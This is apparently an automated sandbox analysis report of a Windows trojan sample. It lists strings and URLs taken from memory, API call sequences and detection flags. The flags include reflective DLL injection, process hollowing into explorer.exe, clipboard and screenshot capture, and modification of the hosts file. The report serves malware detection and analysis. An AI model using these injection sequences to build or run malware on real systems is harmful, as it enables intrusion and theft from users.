Source: 7DF0.tmp.zx.exe, 0000000C.00000003.2335851798.00000158F7EB7000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000C.00000002.2337847563.00000158F9D40000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.python.org/download/releases/2.3/mro/.
Source: 5BB2.tmp.x.exe, 00000006.00000002.2514168774.0000000002F27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000003.00000000.2112423865.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3322496688.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3097976192.000000000C50F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000003.00000000.2102582663.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3311346197.00000000076F8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000003.00000003.2209592603.000000000AA42000.00000004.00000001.00020000.00000000.sdmp, 5BB2.tmp.x.exe, 00000006.00000000.2210094647.00000000005D2000.00000002.00000001.01000000.00000009.sdmp, 5BB2.tmp.x.exe, 00000006.00000002.2514168774.0000000002989000.00000004.00000800.00020000.00000000.sdmp, 5BB2.tmp.x.exe.3.dr String found in binary or memory: https://api.ip.sb/ip
Source: explorer.exe, 00000003.00000002.3316980175.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2105614725.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000003.00000000.2102582663.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3311346197.0000000007637000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000003.00000003.3095690178.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2101707971.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2680703402.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3308188435.00000000035FA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.coml
Source: 5BB2.tmp.x.exe, 00000006.00000002.2514168774.0000000002F27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 5BB2.tmp.x.exe, 00000006.00000002.2514168774.0000000002F27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 5BB2.tmp.x.exe, 00000006.00000002.2514168774.0000000002F27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 5BB2.tmp.x.exe, 00000006.00000002.2514168774.0000000002F27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 5BB2.tmp.x.exe, 00000006.00000002.2514168774.0000000002F27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabS
Source: 5BB2.tmp.x.exe, 00000006.00000002.2514168774.0000000002F27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000003.00000003.3095338529.0000000009B91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3099827021.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3318474411.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3097906687.0000000009C05000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2105614725.0000000009B91000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: 7DF0.tmp.zx.exe, 0000000C.00000003.2336723022.00000158F7E08000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000C.00000003.2336863326.00000158F7E98000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000C.00000002.2337355356.00000158F7E9A000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000C.00000003.2336394060.00000158F7E01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: 7DF0.tmp.zx.exe, 0000000C.00000002.2337611351.00000158F9A00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: 7DF0.tmp.zx.exe, 0000000C.00000003.2336394060.00000158F7E01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: 7DF0.tmp.zx.exe, 0000000C.00000003.2336723022.00000158F7E08000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000C.00000003.2336863326.00000158F7E98000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000C.00000002.2337355356.00000158F7E9A000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000C.00000003.2336394060.00000158F7E01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: 7DF0.tmp.zx.exe, 0000000C.00000003.2336723022.00000158F7E08000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000C.00000003.2336863326.00000158F7E98000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000C.00000002.2337355356.00000158F7E9A000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000C.00000003.2336394060.00000158F7E01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: explorer.exe, 00000003.00000003.3095338529.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3318601080.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2105614725.0000000009B91000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000003.00000000.2112423865.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3322496688.000000000C460000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000003.00000000.2105614725.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3316980175.00000000099B0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000003.00000000.2105614725.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3316980175.00000000099B0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.comon
Source: 7DF0.tmp.zx.exe, 0000000A.00000003.2315840998.000002431721D000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2304137052.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2301103912.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2317567736.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2304926255.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2305426346.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2318809241.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2321669980.000002431721D000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2321669980.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2322802000.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2300771207.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2315840998.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2322802000.0000024317219000.00000004.00000020.00020000.00000000.sdmp, unicodedata.pyd.10.dr, _lzma.pyd.10.dr, libcrypto-1_1.dll.10.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 5BB2.tmp.x.exe, 00000006.00000002.2514168774.0000000002F27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: 5BB2.tmp.x.exe, 00000006.00000002.2514168774.0000000002F27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: libcrypto-1_1.dll.10.dr String found in binary or memory: https://www.openssl.org/H
Contains functionality for read data from the clipboard
Source: C:\Windows\explorer.exe Code function: 3_2_110660A0 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 3_2_110660A0
Contains functionality to modify clipboard data
Source: C:\Windows\explorer.exe Code function: 3_2_110660A0 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 3_2_110660A0
Contains functionality to read the clipboard data
Source: C:\Windows\explorer.exe Code function: 3_2_11065EA4 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 3_2_11065EA4
Contains functionality to record screenshots
Source: C:\Windows\explorer.exe Code function: 3_2_110699A0 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateCompatibleBitmap,CreateCompatibleDC,SelectObject,SetStretchBltMode,StretchBlt,DeleteObject,DeleteDC,free,free,free,malloc,malloc,malloc,GetDIBits,DeleteObject,ReleaseDC,DeleteDC,memcpy,memcpy, 3_2_110699A0

Spam, unwanted Advertisements and Ransom Demands
barindex
Modifies the hosts file
Source: C:\Windows\System32\svchost.exe File written: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe Code function: 3_2_1106A4F8 memset,memset,OpenDesktopA,CreateDesktopA,SetThreadDesktop,CreateThread,WaitForSingleObject,free,free,free,CloseHandle,CloseHandle, 3_2_1106A4F8

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 3.2.explorer.exe.8b70000.3.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 3.2.explorer.exe.8b70000.3.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 3.2.explorer.exe.9ee0000.8.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 3.2.explorer.exe.9ee0000.8.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 3.2.explorer.exe.3350000.2.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 3.0.explorer.exe.3350000.2.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 3.2.explorer.exe.11050000.10.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 3.2.explorer.exe.3350000.2.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 3.2.explorer.exe.11050000.10.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 3.0.explorer.exe.3350000.2.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000003.00000002.3315625714.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000003.00000002.3319025344.0000000009EE0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000003.00000002.3307584261.0000000003350000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000003.00000002.3327889570.0000000011050000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000003.00000000.2101572889.0000000003350000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Abnormal high CPU Usage
Source: C:\Windows\System32\svchost.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF9418E0 wcsnlen,GetModuleHandleA,GetProcAddress,lstrcatW,CreateProcessInternalW,NtMapViewOfSection,ResumeThread, 0_2_00007FF6CF9418E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF9417F4 NtCreateSection,GetFileSize,SetFilePointer,WriteFile,SetFilePointer,NtClose, 0_2_00007FF6CF9417F4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF94159C GetTempPathW,GetTempFileNameW,RtlInitUnicodeString,NtOpenFile,NtSetInformationFile,NtWriteFile,GetLastError, 0_2_00007FF6CF94159C
Source: C:\Windows\explorer.exe Code function: 3_2_08B7E948 CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free, 3_2_08B7E948
Source: C:\Windows\explorer.exe Code function: 3_2_08B80420 NtQueryInformationProcess, 3_2_08B80420
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCA159C GetTempPathW,GetTempFileNameW,RtlInitUnicodeString,NtOpenFile,NtSetInformationFile,NtWriteFile,GetLastError, 4_2_00007FF6BCCA159C
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCA17F4 NtCreateSection,GetFileSize,SetFilePointer,WriteFile,SetFilePointer,NtClose, 4_2_00007FF6BCCA17F4
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCA18E0 wcsnlen,GetModuleHandleA,GetProcAddress,lstrcatW,CreateProcessInternalW,NtMapViewOfSection,ResumeThread, 4_2_00007FF6BCCA18E0
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF94610C 0_2_00007FF6CF94610C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF944FD8 0_2_00007FF6CF944FD8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF94159C 0_2_00007FF6CF94159C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF95D8E4 0_2_00007FF6CF95D8E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF95B934 0_2_00007FF6CF95B934
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF960898 0_2_00007FF6CF960898
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF957014 0_2_00007FF6CF957014
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF957E34 0_2_00007FF6CF957E34
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF953DF8 0_2_00007FF6CF953DF8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF953414 0_2_00007FF6CF953414
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF947370 0_2_00007FF6CF947370
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF955344 0_2_00007FF6CF955344
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF95B310 0_2_00007FF6CF95B310
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF957A84 0_2_00007FF6CF957A84
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF95FA88 0_2_00007FF6CF95FA88
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF95F234 0_2_00007FF6CF95F234
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF94F998 0_2_00007FF6CF94F998
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF95317C 0_2_00007FF6CF95317C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF955994 0_2_00007FF6CF955994
Source: C:\Windows\explorer.exe Code function: 3_2_0335C698 3_2_0335C698
Source: C:\Windows\explorer.exe Code function: 3_2_03352380 3_2_03352380
Source: C:\Windows\explorer.exe Code function: 3_2_03354F70 3_2_03354F70
Source: C:\Windows\explorer.exe Code function: 3_2_0335CE2C 3_2_0335CE2C
Source: C:\Windows\explorer.exe Code function: 3_2_0335AEF0 3_2_0335AEF0
Source: C:\Windows\explorer.exe Code function: 3_2_033515B0 3_2_033515B0
Source: C:\Windows\explorer.exe Code function: 3_2_08B721B0 3_2_08B721B0
Source: C:\Windows\explorer.exe Code function: 3_2_08B7DA2C 3_2_08B7DA2C
Source: C:\Windows\explorer.exe Code function: 3_2_08B7D298 3_2_08B7D298
Source: C:\Windows\explorer.exe Code function: 3_2_08B7BAF0 3_2_08B7BAF0
Source: C:\Windows\explorer.exe Code function: 3_2_08B75B70 3_2_08B75B70
Source: C:\Windows\explorer.exe Code function: 3_2_08B72F80 3_2_08B72F80
Source: C:\Windows\explorer.exe Code function: 3_2_09EFA2D0 3_2_09EFA2D0
Source: C:\Windows\explorer.exe Code function: 3_2_09EFF1B8 3_2_09EFF1B8
Source: C:\Windows\explorer.exe Code function: 3_2_09EE4990 3_2_09EE4990
Source: C:\Windows\explorer.exe Code function: 3_2_09F0393C 3_2_09F0393C
Source: C:\Windows\explorer.exe Code function: 3_2_09EF90EC 3_2_09EF90EC
Source: C:\Windows\explorer.exe Code function: 3_2_09EE40B0 3_2_09EE40B0
Source: C:\Windows\explorer.exe Code function: 3_2_09EFF830 3_2_09EFF830
Source: C:\Windows\explorer.exe Code function: 3_2_09F03BD4 3_2_09F03BD4
Source: C:\Windows\explorer.exe Code function: 3_2_09F0CBBC 3_2_09F0CBBC
Source: C:\Windows\explorer.exe Code function: 3_2_09F04B74 3_2_09F04B74
Source: C:\Windows\explorer.exe Code function: 3_2_09EF9B4C 3_2_09EF9B4C
Source: C:\Windows\explorer.exe Code function: 3_2_09F0AB04 3_2_09F0AB04
Source: C:\Windows\explorer.exe Code function: 3_2_09F02248 3_2_09F02248
Source: C:\Windows\explorer.exe Code function: 3_2_09F0FA27 3_2_09F0FA27
Source: C:\Windows\explorer.exe Code function: 3_2_09EF9D48 3_2_09EF9D48
Source: C:\Windows\explorer.exe Code function: 3_2_09F0B510 3_2_09F0B510
Source: C:\Windows\explorer.exe Code function: 3_2_09F0A4E0 3_2_09F0A4E0
Source: C:\Windows\explorer.exe Code function: 3_2_09F0D410 3_2_09F0D410
Source: C:\Windows\explorer.exe Code function: 3_2_09F0EFD4 3_2_09F0EFD4
Source: C:\Windows\explorer.exe Code function: 3_2_09F01E98 3_2_09F01E98
Source: C:\Windows\explorer.exe Code function: 3_2_11054CB0 3_2_11054CB0
Source: C:\Windows\explorer.exe Code function: 3_2_1107C110 3_2_1107C110
Source: C:\Windows\explorer.exe Code function: 3_2_1106A948 3_2_1106A948
Source: C:\Windows\explorer.exe Code function: 3_2_1107E010 3_2_1107E010
Source: C:\Windows\explorer.exe Code function: 3_2_1107B0E0 3_2_1107B0E0
Source: C:\Windows\explorer.exe Code function: 3_2_1107FBD4 3_2_1107FBD4
Source: C:\Windows\explorer.exe Code function: 3_2_11072A98 3_2_11072A98
Source: C:\Windows\explorer.exe Code function: 3_2_1107453C 3_2_1107453C
Source: C:\Windows\explorer.exe Code function: 3_2_11055590 3_2_11055590
Source: C:\Windows\explorer.exe Code function: 3_2_1106FDB8 3_2_1106FDB8
Source: C:\Windows\explorer.exe Code function: 3_2_11070430 3_2_11070430
Source: C:\Windows\explorer.exe Code function: 3_2_11069CEC 3_2_11069CEC
Source: C:\Windows\explorer.exe Code function: 3_2_1107B704 3_2_1107B704
Source: C:\Windows\explorer.exe Code function: 3_2_1106A74C 3_2_1106A74C
Source: C:\Windows\explorer.exe Code function: 3_2_11075774 3_2_11075774
Source: C:\Windows\explorer.exe Code function: 3_2_1107D7BC 3_2_1107D7BC
Source: C:\Windows\explorer.exe Code function: 3_2_110747D4 3_2_110747D4
Source: C:\Windows\explorer.exe Code function: 3_2_11080627 3_2_11080627
Source: C:\Windows\explorer.exe Code function: 3_2_11072E48 3_2_11072E48
Source: C:\Windows\explorer.exe Code function: 3_2_1106AED0 3_2_1106AED0
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCA159C 4_2_00007FF6BCCA159C
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCA4FD8 4_2_00007FF6BCCA4FD8
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCA610C 4_2_00007FF6BCCA610C
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCB3DF8 4_2_00007FF6BCCB3DF8
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCB7E34 4_2_00007FF6BCCB7E34
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCB7014 4_2_00007FF6BCCB7014
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCBB934 4_2_00007FF6BCCBB934
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCBD8E4 4_2_00007FF6BCCBD8E4
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCC0898 4_2_00007FF6BCCC0898
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCBF234 4_2_00007FF6BCCBF234
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCB5994 4_2_00007FF6BCCB5994
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCB317C 4_2_00007FF6BCCB317C
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCAF998 4_2_00007FF6BCCAF998
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCBB310 4_2_00007FF6BCCBB310
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCBFA88 4_2_00007FF6BCCBFA88
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCB7A84 4_2_00007FF6BCCB7A84
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCB3414 4_2_00007FF6BCCB3414
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCB5344 4_2_00007FF6BCCB5344
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCA7370 4_2_00007FF6BCCA7370
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA64FD8 5_2_00007FF78FA64FD8
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA80898 5_2_00007FF78FA80898
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA6610C 5_2_00007FF78FA6610C
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA7D8E4 5_2_00007FF78FA7D8E4
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA77014 5_2_00007FF78FA77014
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA77E34 5_2_00007FF78FA77E34
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA6159C 5_2_00007FF78FA6159C
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA73DF8 5_2_00007FF78FA73DF8
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA73414 5_2_00007FF78FA73414
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA75344 5_2_00007FF78FA75344
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA67370 5_2_00007FF78FA67370
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA7B310 5_2_00007FF78FA7B310
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA7F234 5_2_00007FF78FA7F234
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA7FA88 5_2_00007FF78FA7FA88
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA77A84 5_2_00007FF78FA77A84
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA6F998 5_2_00007FF78FA6F998
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA7B934 5_2_00007FF78FA7B934
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA75994 5_2_00007FF78FA75994
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA7317C 5_2_00007FF78FA7317C
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Code function: 6_2_00DEDC74 6_2_00DEDC74
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Code function: 6_2_04ECEE58 6_2_04ECEE58
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Code function: 6_2_04EC8850 6_2_04EC8850
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Code function: 6_2_04EC0040 6_2_04EC0040
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Code function: 6_2_04EC001F 6_2_04EC001F
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Code function: 6_2_04EC8840 6_2_04EC8840
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Code function: 6_2_04EC5A53 6_2_04EC5A53
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34B4FD8 9_2_00007FF7A34B4FD8
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34B7370 9_2_00007FF7A34B7370
